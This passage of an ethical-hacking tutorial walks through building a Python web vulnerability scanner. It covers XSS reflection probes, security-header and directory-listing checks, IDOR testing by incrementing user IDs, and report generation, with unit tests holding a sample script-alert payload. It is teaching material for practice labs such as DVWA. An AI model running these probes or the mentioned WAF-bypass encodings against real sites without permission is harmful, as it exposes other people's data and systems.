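        return ""  # Input is not reflected at all
    end = body.find(marker, start + len(marker))
    if end == -1:
        return ""  # Reflection was truncated or altered
    reflected = body[start + len(marker):end]
    return "".join(ch for ch in PROBE_CHARS if ch in reflected)


marker, probe = build_probe()
unsafe_body = f"<p>You searched for {probe}</p>"
encoded_body = f"<p>You searched for {html.escape(probe)}</p>"
```

If only quotes survive, attribute-context payloads are worth trying; if nothing survives, the parameter can be skipped, which cuts both request volume and false positives.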
Phase 4: Security Headers and Misconfig Detection (Days 9-11)
Goal: Check for missing security headers and misconfigurations
Implementation steps:
1. Security headers analyzer:
```python
from typing import List

import requests

SECURITY_HEADERS = {
    "Strict-Transport-Security": {
        "severity": "medium",
        "recommendation": "Add HSTS header: Strict-Transport-Security: max-age=31536000; includeSubDomains",
    },
    "Content-Security-Policy": {
        "severity": "medium",
        "recommendation": "Implement Content Security Policy to prevent XSS",
    },
    "X-Content-Type-Options": {
        "severity": "low",
        "recommendation": "Add X-Content-Type-Options: nosniff",
    },
    "X-Frame-Options": {
        "severity": "medium",
        "recommendation": "Add X-Frame-Options: DENY or SAMEORIGIN",
    },
    "X-XSS-Protection": {
        "severity": "low",
        "recommendation": "Add X-XSS-Protection: 1; mode=block",
    },
}


def check_security_headers(response: requests.Response) -> List[Vulnerability]:
    vulnerabilities = []
    # response.headers is case-insensitive, so exact header casing does not matter
    for header, info in SECURITY_HEADERS.items():
        if header not in response.headers:
            vulnerabilities.append(Vulnerability(
                vuln_type=f"Missing Security Header: {header}",
                severity=info['severity'],
                url=response.url,
                parameter="N/A",
                payload="N/A",
                evidence=f"Header {header} not present in response",
                reproduction_steps=[
                    f"1. Request {response.url}",
                    "2. Inspect response headers",
                    f"3. Note absence of {header}",
                ],
                recommendation=info['recommendation'],
            ))
    # Check for information disclosure
    for header in ['Server', 'X-Powered-By', 'X-AspNet-Version']:
        if header in response.headers:
            vulnerabilities.append(Vulnerability(
                vuln_type=f"Information Disclosure: {header}",
                severity='low',
                url=response.url,
                parameter="N/A",
                payload="N/A",
                evidence=f"{header}: {response.headers[header]}",
                reproduction_steps=[...],
                recommendation=f"Remove or genericize {header} header",
            ))
    return vulnerabilities
```
2. Directory listing detection:
```python
def check_directory_listing(session: WebSession, base_url: str) -> List[Vulnerability]:
    common_dirs = ['/images/', '/uploads/', '/static/', '/assets/', '/css/', '/js/']
    vulnerabilities = []
    for directory in common_dirs:
        url = urljoin(base_url, directory)
        response = session.get(url)
        if response.status_code == 200:
            # Typical titles of auto-generated index pages
            if 'Index of' in response.text or 'Directory listing' in response.text:
                vulnerabilities.append(Vulnerability(
                    vuln_type="Directory Listing Enabled",
                    severity="low",
                    url=url,
                    parameter="N/A",
                    payload="N/A",
                    evidence="Directory contents visible",
                    reproduction_steps=[f"Navigate to {url}"],
                    recommendation="Disable directory listing in web server config",
                ))
    return vulnerabilities
```
Phase 5: IDOR and Access Control (Days 11-13)
Goal: Detect insecure direct object references
Implementation steps:
1. Identify numeric parameters:
```python
def find_numeric_params(crawl_results: List[CrawlResult]) -> List[tuple]:
    """Find all numeric ID parameters"""
    id_params = []
    for result in crawl_results:
        for param in result.parameters:
            # Check if value is numeric
            if param.value.isdigit():
                id_params.append((result.url, param.name, param.value))
    return id_params
```
2. Test for IDOR:
```python
def test_idor(session: WebSession, url: str, param: str, original_id: str) -> Optional[Vulnerability]:
    """Test if changing ID returns different user's data"""
    # Get original response
    original_response = session.get(url)
    # Try adjacent IDs
    test_ids = [
        str(int(original_id) + 1),
        str(int(original_id) - 1),
        str(int(original_id) * 2),
    ]
    for test_id in test_ids:
        modified_url = url.replace(f"{param}={original_id}", f"{param}={test_id}")
        test_response = session.get(modified_url)
        # If we get a 200 with different content, potential IDOR
        if test_response.status_code == 200:
            if test_response.text != original_response.text:
                # Further analysis: does it contain PII-like data?
                if contains_pii_indicators(test_response.text):
                    return Vulnerability(
                        vuln_type="Insecure Direct Object Reference (IDOR)",
                        severity="high",
                        url=url,
                        parameter=param,
                        payload=f"Changed {original_id} to {test_id}",
                        evidence="Different data returned for modified ID",
                        reproduction_steps=[
                            f"1. Request original: {url}",
                            f"2. Modify {param} from {original_id} to {test_id}",
                            "3. Observe different user data returned",
                        ],
                        recommendation="Implement proper authorization checks",
                    )
    return None


def contains_pii_indicators(text: str) -> bool:
    """Check if response might contain personal data"""
    indicators = ["email", "phone", "address", "ssn", "password", "credit", "account"]
    lowered = text.lower()
    return any(ind in lowered for ind in indicators)
```
Phase 6: Reporting and Integration (Days 13-14)
Goal: Generate professional vulnerability reports
Implementation steps:
1. Report generator:
```python
import json
from dataclasses import asdict
from datetime import datetime
from typing import List

from jinja2 import Template


def generate_html_report(vulnerabilities: List[Vulnerability], target: str) -> str:
    # autoescape=True matters here: findings contain XSS payloads, and
    # rendering them unescaped would make the report itself exploitable
    template = Template('''
<!DOCTYPE html>
<html>
<head>
  <title>Vulnerability Scan Report - {{ target }}</title>
  <style>
    .critical { background-color: #ff4444; color: white; }
    .high { background-color: #ff8800; color: white; }
    .medium { background-color: #ffbb33; }
    .low { background-color: #99cc00; }
    .finding { border: 1px solid #ccc; margin: 10px; padding: 15px; }
  </style>
</head>
<body>
  <h1>Vulnerability Scan Report</h1>
  <h2>Target: {{ target }}</h2>
  <h2>Scan Date: {{ scan_date }}</h2>
  <h3>Summary</h3>
  <ul>
    <li class="critical">Critical: {{ critical_count }}</li>
    <li class="high">High: {{ high_count }}</li>
    <li class="medium">Medium: {{ medium_count }}</li>
    <li class="low">Low: {{ low_count }}</li>
  </ul>
  <h3>Findings</h3>
  {% for vuln in vulnerabilities %}
  <div class="finding {{ vuln.severity }}">
    <h4>{{ vuln.vuln_type }}</h4>
    <p><strong>URL:</strong> {{ vuln.url }}</p>
    <p><strong>Parameter:</strong> {{ vuln.parameter }}</p>
    <p><strong>Payload:</strong> <code>{{ vuln.payload }}</code></p>
    <p><strong>Evidence:</strong> {{ vuln.evidence }}</p>
    <p><strong>Recommendation:</strong> {{ vuln.recommendation }}</p>
  </div>
  {% endfor %}
</body>
</html>
''', autoescape=True)
    return template.render(
        target=target,
        scan_date=datetime.now().isoformat(),
        vulnerabilities=vulnerabilities,
        critical_count=sum(1 for v in vulnerabilities if v.severity == 'critical'),
        high_count=sum(1 for v in vulnerabilities if v.severity == 'high'),
        medium_count=sum(1 for v in vulnerabilities if v.severity == 'medium'),
        low_count=sum(1 for v in vulnerabilities if v.severity == 'low'),
    )
```
2. JSON export for tool integration:
```python
def export_json(vulnerabilities: List[Vulnerability], filepath: str):
    data = {
        'scan_date': datetime.now().isoformat(),
        'total_findings': len(vulnerabilities),
        'findings': [asdict(v) for v in vulnerabilities],
    }
    with open(filepath, 'w') as f:
        json.dump(data, f, indent=2)
```
Testing Strategy
Testing Against Intentionally Vulnerable Applications
- DVWA (Damn Vulnerable Web Application)
- Test at โLowโ security level first
- Progress through Medium and High
- Your scanner should find SQLi and XSS at Low
- OWASP WebGoat
- Structured lessons for each vulnerability type
- Verify your scanner finds the intended vulnerabilities
- OWASP Juice Shop
- Modern JavaScript-heavy application
- Tests your crawler's ability to handle SPAs
Unit Testing Payloads
def test_sqli_payloads_detected():
    # A known MySQL error string should be flagged
    vulnerable_response = "You have an error in your SQL syntax"
    assert is_sqli_error(vulnerable_response)
    # An ordinary empty-result page should not be flagged
    clean_response = "No products found"
    assert not is_sqli_error(clean_response)

def test_xss_reflection_detection():
    # The payload appears unencoded inside an attribute value
    html = '<input value="<script>alert(1)</script>">'
    assert detect_xss_reflection(html, '<script>alert(1)</script>')
Common Pitfalls and Debugging
1. "False positives everywhere"
Problem: Scanner reports vulnerabilities that aren't real
Solutions:
- Verify each finding by actually exploiting it (does the payload execute?)
- Add confidence scoring
- Require multiple indicators before reporting
- Filter out honeypot/WAF responses
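One way to combine confidence scoring with the "multiple indicators" rule is sketched below. The indicator names, weights, and thresholds are illustrative assumptions, not values from this project; calibrate them against DVWA and a known-clean application.

```python
from dataclasses import dataclass, field
from typing import List

# Hypothetical indicator weights; tune these against your own test targets.
INDICATOR_WEIGHTS = {
    "sql_error_message": 0.5,
    "time_delay": 0.4,
    "response_length_diff": 0.2,
    "status_code_change": 0.1,
}


@dataclass
class Candidate:
    """A possible finding plus the names of the indicators that fired."""
    url: str
    parameter: str
    indicators: List[str] = field(default_factory=list)


def confidence(candidate: Candidate) -> float:
    """Sum the weights of the distinct indicators, capped at 1.0."""
    score = sum(INDICATOR_WEIGHTS.get(name, 0.0) for name in set(candidate.indicators))
    return min(score, 1.0)


def should_report(candidate: Candidate, threshold: float = 0.6,
                  min_indicators: int = 2) -> bool:
    """Report only when enough independent indicators agree."""
    distinct = set(candidate.indicators)
    return len(distinct) >= min_indicators and confidence(candidate) >= threshold
```

With these assumed weights, a lone SQL error string is not reported, while an error string plus a reproducible time delay is. Weaker candidates can still be logged at a lower severity for manual review.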
2. "Missing obvious vulnerabilities"
Problem: Known vulnerable app, scanner finds nothing
Debug steps:
- Is the crawler finding the vulnerable pages?
- Is the parameter being tested?
- Check if WAF is blocking payloads
- Try different payload encodings
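For the last debug step, a small helper can generate encoded variants of a payload so each one can be sent in turn. This is a minimal sketch using only the standard library; the function name `encoding_variants` and the choice of variants are assumptions, and real filter evasion usually needs context-specific encodings.

```python
from typing import Dict
from urllib.parse import quote


def encoding_variants(payload: str) -> Dict[str, str]:
    """Return the payload under a few common encodings, keyed by variant name."""
    url_once = quote(payload, safe="")
    return {
        "raw": payload,
        # Percent-encode every reserved character.
        "url": url_once,
        # Encode again, for targets that decode the input twice.
        "double_url": quote(url_once, safe=""),
        # Alternate upper/lower case to get past naive keyword filters.
        "mixed_case": "".join(
            ch.upper() if i % 2 == 0 else ch.lower()
            for i, ch in enumerate(payload)
        ),
    }
```

If only one variant triggers the vulnerability, that is a useful hint about where filtering or decoding happens in the target.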
3. "Crawler goes off-site or loops forever"
Problem: Crawler follows external links or revisits pages
Solutions:
- Strict domain checking
- Track visited URLs in a set
- Set maximum crawl depth
- Implement timeout per page
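The first three solutions can be sketched as a breadth-first crawl loop. Here `fetch_links` is a hypothetical callable that downloads a page (with its own per-request timeout) and returns the `href` values it found; it is not part of this project's code.

```python
from collections import deque
from typing import Callable, Iterable, List, Set
from urllib.parse import urldefrag, urljoin, urlparse


def in_scope(url: str, allowed_host: str) -> bool:
    """Strict check: http(s) only, and the hostname must match exactly."""
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and parsed.hostname == allowed_host


def normalize(url: str) -> str:
    """Drop the #fragment so the same page is not queued twice."""
    return urldefrag(url).url


def crawl(start_url: str,
          fetch_links: Callable[[str], Iterable[str]],
          max_depth: int = 3) -> List[str]:
    """Visit in-scope pages breadth-first, each at most once, up to max_depth."""
    allowed_host = urlparse(start_url).hostname
    visited: Set[str] = set()
    order: List[str] = []
    queue = deque([(normalize(start_url), 0)])
    while queue:
        url, depth = queue.popleft()
        if url in visited or depth > max_depth or not in_scope(url, allowed_host):
            continue
        visited.add(url)
        order.append(url)
        for href in fetch_links(url):
            # Resolve relative links against the page they came from.
            queue.append((normalize(urljoin(url, href)), depth + 1))
    return order
```

Exact hostname matching deliberately excludes subdomains. If subdomains are in scope for your engagement, widen `in_scope` explicitly and do not fall back to a substring check, which would also match hosts like `app.test.evil.example`.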
4. "XSS not detected even when payload reflects"
Problem: Payload in response but not marked as XSS
Debug steps:
- Is response HTML or JSON?
- Is payload HTML-encoded in response?
- Check if context detection is working
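The first two debug questions can be answered in code before any context analysis runs. The sketch below is an assumption about how to structure that check, and the function name and return labels are hypothetical. It separates raw reflection in HTML from HTML-encoded reflection and from reflection in non-HTML responses.

```python
import html


def classify_reflection(body: str, content_type: str, payload: str) -> str:
    """Return 'not_reflected', 'encoded', 'non_html', or 'raw_html'."""
    encoded = html.escape(payload, quote=True)
    if payload not in body:
        # The payload may still be present, but neutralized by HTML encoding.
        if encoded != payload and encoded in body:
            return "encoded"
        return "not_reflected"
    # Ignore parameters such as "; charset=utf-8" when reading the media type.
    media_type = content_type.split(";")[0].strip().lower()
    if media_type not in ("text/html", "application/xhtml+xml"):
        return "non_html"
    return "raw_html"
```

Only `raw_html` is a candidate for reflected XSS, and it still needs context detection (tag body, attribute value, script block) before it is reported. Logging the other labels makes it clear why a reflected payload was not flagged.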
Extensions and Challenges
Beginner Extensions
- Add more payloads: Load from external files
- Progress reporting: Show real-time scan progress
- Proxy support: Route through Burp Suite
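As a starting point for the first extension, payloads can be read from a plain text file with one payload per line. The file format here (blank lines skipped, lines starting with `#` treated as comments) is an assumption for illustration. Payloads that themselves begin with `#` would need a different comment convention.

```python
from pathlib import Path
from typing import List


def load_payloads(path: str) -> List[str]:
    """Read one payload per line, skipping blank lines and '#' comment lines."""
    payloads: List[str] = []
    for line in Path(path).read_text(encoding="utf-8").splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        # Keep the line verbatim: trailing spaces matter in payloads like "-- ".
        payloads.append(line)
    return payloads
```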
Intermediate Extensions
- JavaScript rendering: Use Selenium for SPAs
- CSRF detection: Check for missing tokens
- Session handling: Test with authenticated sessions
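For the CSRF extension, a first pass can flag POST forms that contain no token-like field. This sketch uses the standard library's `html.parser`. The list of name fragments in `TOKEN_HINTS` is an assumption, and the check is only a heuristic: applications that protect requests with custom headers or SameSite cookies will show up as false positives.

```python
from html.parser import HTMLParser
from typing import Dict, List, Optional

# Hypothetical name fragments; real applications use many different token names.
TOKEN_HINTS = ("csrf", "xsrf", "token", "authenticity")


class FormCollector(HTMLParser):
    """Collect each form's method, action, and input names."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict] = []
        self._current: Optional[Dict] = None

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "form":
            self._current = {
                "action": attr.get("action") or "",
                "method": (attr.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append((attr.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def forms_missing_csrf_token(page_html: str) -> List[str]:
    """Return the actions of POST forms that have no token-like input name."""
    collector = FormCollector()
    collector.feed(page_html)
    return [
        form["action"]
        for form in collector.forms
        if form["method"] == "post"
        and not any(hint in name for name in form["inputs"] for hint in TOKEN_HINTS)
    ]
```

Treat the result as a list of forms to verify manually, for example by replaying the request without the session's token, not as confirmed findings.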
Advanced Extensions
- WAF bypass payloads: Encoding and obfuscation
- API fuzzing: REST/GraphQL vulnerability testing
- SSRF detection: With callback server
- Stored XSS: Re-check pages for persisted payloads
Real-World Connections
Commercial Scanners
Your project is a simplified version of:
- Burp Suite Pro - Industry standard web scanner
- OWASP ZAP - Open source alternative
- Nuclei - Template-based vulnerability scanner
After this project, study how these tools work. They're built on the same concepts but with years of refinement.
Bug Bounty Application
These skills directly apply to bug bounty:
- Subdomain enumeration → More attack surface
- Automated scanning → Find low-hanging fruit
- Manual verification → Avoid duplicate reports
- Report writing → Get paid faster
Self-Assessment Checklist
Core Functionality
- Crawler discovers all pages and forms
- SQLi detection works (error-based and time-based)
- XSS detection works (reflected)
- Security headers are checked
- HTML report is generated
Code Quality
- Modular design (can add new modules easily)
- Error handling (doesn't crash on edge cases)
- Configuration options (timeout, threads, etc.)
- CLI with --help
Understanding
- Can explain how SQL injection works at query level
- Understand difference between XSS contexts
- Know why parameterized queries prevent SQLi
- Understand OWASP Top 10 categories
Validation
- Finds vulnerabilities in DVWA (low security)
- Minimal false positives on clean application
- Report is professional quality
Resources
Primary Reading
- "Bug Bounty Bootcamp" by Vickie Li - Chapters 6-12
- "The Web Application Hacker's Handbook" by Stuttard & Pinto
- "HTTP: The Definitive Guide" by David Gourley
Online Resources
- PortSwigger Web Security Academy - Free interactive labs
- OWASP Testing Guide
- PayloadsAllTheThings
Practice Environments
- DVWA - docker run -p 80:80 vulnerables/web-dvwa
- OWASP WebGoat - docker run -p 8080:8080 webgoat/webgoat
- OWASP Juice Shop - docker run -p 3000:3000 bkimminich/juice-shop
This project is part of the Ethical Hacking & Penetration Testing learning path.